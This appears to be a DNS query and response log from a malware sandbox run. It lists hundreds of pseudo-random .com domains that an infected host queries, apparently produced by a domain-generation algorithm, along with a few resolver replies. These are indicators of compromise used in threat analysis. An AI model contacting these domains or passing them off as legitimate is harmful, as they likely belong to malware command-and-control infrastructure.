                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740704060 CET192.168.2.81.1.1.10x6f97Standard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740888119 CET192.168.2.81.1.1.10x3befStandard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.741049051 CET192.168.2.81.1.1.10x2fb0Standard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.741188049 CET192.168.2.81.1.1.10xcedeStandard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.741337061 CET192.168.2.81.1.1.10xda1fStandard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.745699883 CET192.168.2.81.1.1.10x1382Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.745744944 CET192.168.2.81.1.1.10xc60Standard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.745906115 CET192.168.2.81.1.1.10x2519Standard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.745943069 CET192.168.2.81.1.1.10xc3deStandard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.747354031 CET192.168.2.81.1.1.10x641fStandard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.329818964 CET192.168.2.81.1.1.10x50a4Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.335997105 CET192.168.2.81.1.1.10x1858Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.336407900 CET192.168.2.81.1.1.10x886bStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.340081930 CET192.168.2.81.1.1.10x4995Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.341064930 CET192.168.2.81.1.1.10xd0f6Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.356642008 CET192.168.2.81.1.1.10x77feStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.362806082 CET192.168.2.81.1.1.10xcde1Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.362951994 CET192.168.2.81.1.1.10x10e7Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.370963097 CET192.168.2.81.1.1.10x1936Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.427406073 CET192.168.2.81.1.1.10xcbe6Standard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.427648067 CET192.168.2.81.1.1.10x76d1Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.427839041 CET192.168.2.81.1.1.10x74e1Standard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.428070068 CET192.168.2.81.1.1.10x78f1Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.451994896 CET192.168.2.81.1.1.10xb0d9Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.484781981 CET192.168.2.81.1.1.10x33d4Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.485193968 CET192.168.2.81.1.1.10x2cadStandard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.485383987 CET192.168.2.81.1.1.10x9e87Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.497920990 CET192.168.2.81.1.1.10x24c9Standard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.498975992 CET192.168.2.81.1.1.10xaba9Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.536467075 CET192.168.2.81.1.1.10x39aStandard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.536693096 CET192.168.2.81.1.1.10x2421Standard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.536851883 CET192.168.2.81.1.1.10x77d1Standard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.536999941 CET192.168.2.81.1.1.10xa99cStandard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537161112 CET192.168.2.81.1.1.10x982bStandard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537328005 CET192.168.2.81.1.1.10x2f0fStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537472963 CET192.168.2.81.1.1.10x631bStandard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537607908 CET192.168.2.81.1.1.10xb24dStandard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537755013 CET192.168.2.81.1.1.10x442bStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537899971 CET192.168.2.81.1.1.10x94caStandard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538039923 CET192.168.2.81.1.1.10x1441Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538193941 CET192.168.2.81.1.1.10x5dd7Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538330078 CET192.168.2.81.1.1.10x18e8Standard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538486958 CET192.168.2.81.1.1.10x467bStandard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538641930 CET192.168.2.81.1.1.10x735cStandard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538992882 CET192.168.2.81.1.1.10xc0b6Standard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.540559053 CET192.168.2.81.1.1.10x5accStandard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.540736914 CET192.168.2.81.1.1.10x5b1Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.540904045 CET192.168.2.81.1.1.10x815Standard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541053057 CET192.168.2.81.1.1.10xbebcStandard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541201115 CET192.168.2.81.1.1.10xa2d3Standard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541354895 CET192.168.2.81.1.1.10xf324Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541517019 CET192.168.2.81.1.1.10x7968Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541660070 CET192.168.2.81.1.1.10x2676Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541820049 CET192.168.2.81.1.1.10x7e2cStandard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541960001 CET192.168.2.81.1.1.10x1178Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542171001 CET192.168.2.81.1.1.10xd6d6Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542617083 CET192.168.2.81.1.1.10x9cf3Standard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542778015 CET192.168.2.81.1.1.10xbbb6Standard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542956114 CET192.168.2.81.1.1.10x16c8Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.554208040 CET192.168.2.81.1.1.10x91ceStandard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.554718018 CET192.168.2.81.1.1.10xfc01Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.557899952 CET192.168.2.81.1.1.10xce52Standard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558074951 CET192.168.2.81.1.1.10xbbd3Standard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558227062 CET192.168.2.81.1.1.10x967eStandard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558374882 CET192.168.2.81.1.1.10x50daStandard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558856964 CET192.168.2.81.1.1.10x937eStandard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.618438005 CET192.168.2.81.1.1.10xf883Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.621239901 CET192.168.2.81.1.1.10xa1e2Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.621493101 CET192.168.2.81.1.1.10xdbd0Standard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.630203009 CET192.168.2.81.1.1.10x2e70Standard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.631808043 CET192.168.2.81.1.1.10xdc4eStandard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.632425070 CET192.168.2.81.1.1.10xdfbfStandard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.632611990 CET192.168.2.81.1.1.10xbc3dStandard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.633476019 CET192.168.2.81.1.1.10xa05cStandard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.323288918 CET192.168.2.81.1.1.10x268Standard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.881402016 CET192.168.2.81.1.1.10x55e8Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.881630898 CET192.168.2.81.1.1.10x2912Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.883127928 CET192.168.2.81.1.1.10x448aStandard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.896398067 CET192.168.2.81.1.1.10xd5f2Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.896639109 CET192.168.2.81.1.1.10xadbStandard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.896789074 CET192.168.2.81.1.1.10x3b6Standard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.896943092 CET192.168.2.81.1.1.10x4cdcStandard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897089005 CET192.168.2.81.1.1.10x2e48Standard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897238016 CET192.168.2.81.1.1.10x6100Standard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897382021 CET192.168.2.81.1.1.10xc82fStandard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897521973 CET192.168.2.81.1.1.10x12deStandard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897670984 CET192.168.2.81.1.1.10x4523Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897838116 CET192.168.2.81.1.1.10x7dffStandard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897995949 CET192.168.2.81.1.1.10xb307Standard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.898221970 CET192.168.2.81.1.1.10x56cdStandard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.899300098 CET192.168.2.81.1.1.10x6d77Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.900965929 CET192.168.2.81.1.1.10x4dfbStandard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.902208090 CET192.168.2.81.1.1.10x7802Standard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.902615070 CET192.168.2.81.1.1.10xf653Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.905914068 CET192.168.2.81.1.1.10x81baStandard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.936047077 CET192.168.2.81.1.1.10x74efStandard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.037672043 CET192.168.2.81.1.1.10x38e0Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.037995100 CET192.168.2.81.1.1.10x709aStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.039777994 CET192.168.2.81.1.1.10x5e34Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.093453884 CET192.168.2.81.1.1.10x3957Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.095330954 CET192.168.2.81.1.1.10xce1eStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.095972061 CET192.168.2.81.1.1.10xeb88Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.096726894 CET192.168.2.81.1.1.10xcab5Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.098848104 CET192.168.2.81.1.1.10x5a81Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.100832939 CET192.168.2.81.1.1.10x4b46Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.804033995 CET192.168.2.81.1.1.10xe4e4Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.805664062 CET192.168.2.81.1.1.10xbe24Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.808248997 CET192.168.2.81.1.1.10x5258Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.854455948 CET192.168.2.81.1.1.10xc4cdStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.855382919 CET192.168.2.81.1.1.10xa109Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.855806112 CET192.168.2.81.1.1.10x1f0Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.868700981 CET192.168.2.81.1.1.10xc6aeStandard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.880382061 CET192.168.2.81.1.1.10x40acStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.886480093 CET192.168.2.81.1.1.10x50a8Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.889904976 CET192.168.2.81.1.1.10x4df4Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.890583038 CET192.168.2.81.1.1.10xc29aStandard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.891304016 CET192.168.2.81.1.1.10xf460Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.891803980 CET192.168.2.81.1.1.10x15ebStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.892447948 CET192.168.2.81.1.1.10x6d67Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.893603086 CET192.168.2.81.1.1.10x248cStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.894579887 CET192.168.2.81.1.1.10xbed8Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.899547100 CET192.168.2.81.1.1.10x8e83Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.900540113 CET192.168.2.81.1.1.10xeec4Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.915437937 CET192.168.2.81.1.1.10x5749Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.916169882 CET192.168.2.81.1.1.10xf256Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.917431116 CET192.168.2.81.1.1.10x50fbStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.918629885 CET192.168.2.81.1.1.10x5f76Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.918977976 CET192.168.2.81.1.1.10xac58Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.931562901 CET192.168.2.81.1.1.10xa0e5Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.931783915 CET192.168.2.81.1.1.10x379dStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.932173967 CET192.168.2.81.1.1.10xaa67Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.932379007 CET192.168.2.81.1.1.10x5cd0Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.933085918 CET192.168.2.81.1.1.10x3818Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.933264971 CET192.168.2.81.1.1.10x4dcbStandard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.933665991 CET192.168.2.81.1.1.10x6d41Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.934004068 CET192.168.2.81.1.1.10xea6Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.934283972 CET192.168.2.81.1.1.10xad7fStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.936465025 CET192.168.2.81.1.1.10x3704Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.948272943 CET192.168.2.81.1.1.10x730aStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.948497057 CET192.168.2.81.1.1.10xd7fcStandard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.948792934 CET192.168.2.81.1.1.10x4bbeStandard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.950301886 CET192.168.2.81.1.1.10x2ca5Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.950592041 CET192.168.2.81.1.1.10xae71Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.950774908 CET192.168.2.81.1.1.10xe75cStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.951070070 CET192.168.2.81.1.1.10x7f6dStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.951994896 CET192.168.2.81.1.1.10x42c3Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.955358028 CET192.168.2.81.1.1.10x20bStandard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.955663919 CET192.168.2.81.1.1.10x836bStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.956146955 CET192.168.2.81.1.1.10xf641Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.956310987 CET192.168.2.81.1.1.10x294eStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.956368923 CET192.168.2.81.1.1.10xabd1Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.956625938 CET192.168.2.81.1.1.10x80dStandard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.957001925 CET192.168.2.81.1.1.10x2734Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.959009886 CET192.168.2.81.1.1.10x101eStandard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.959064960 CET192.168.2.81.1.1.10xc478Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.959242105 CET192.168.2.81.1.1.10x9859Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.963545084 CET192.168.2.81.1.1.10xa767Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.240614891 CET192.168.2.81.1.1.10x10a5Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.240789890 CET192.168.2.81.1.1.10x857eStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.241024971 CET192.168.2.81.1.1.10x41a5Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.241269112 CET192.168.2.81.1.1.10xc56Standard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.916079998 CET192.168.2.81.1.1.10x83dStandard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.917156935 CET192.168.2.81.1.1.10x3887Standard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.917670012 CET192.168.2.81.1.1.10xba91Standard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.918329000 CET192.168.2.81.1.1.10xcd13Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.918715954 CET192.168.2.81.1.1.10x84c3Standard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.919599056 CET192.168.2.81.1.1.10x1b56Standard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.920340061 CET192.168.2.81.1.1.10x8abfStandard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.920814991 CET192.168.2.81.1.1.10xc19dStandard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.924443007 CET192.168.2.81.1.1.10x36bcStandard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.925867081 CET192.168.2.81.1.1.10xf5eeStandard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.561119080 CET192.168.2.81.1.1.10x2bStandard query (0)ww16.vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.583281040 CET192.168.2.81.1.1.10x567aStandard query (0)ww25.lyxynyx.comA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.069652081 CET1.1.1.1192.168.2.80xb0a9Name error (3)gaqypiz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.071290016 CET1.1.1.1192.168.2.80x6d97Name error (3)pufybyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.082379103 CET1.1.1.1192.168.2.80x9b93No error (0)pupydeq.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.082379103 CET1.1.1.1192.168.2.80x9b93No error (0)pupydeq.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.091897964 CET1.1.1.1192.168.2.80x8c4cName error (3)volymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.169949055 CET1.1.1.1192.168.2.80x5c88Name error (3)vowyzuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.180855036 CET1.1.1.1192.168.2.80xc16cName error (3)qekyhil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.194109917 CET1.1.1.1192.168.2.80x999fName error (3)gacyqob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.198193073 CET1.1.1.1192.168.2.80xd044Name error (3)puzyjoq.comnonenoneA (IP address)IN (0x0001)false
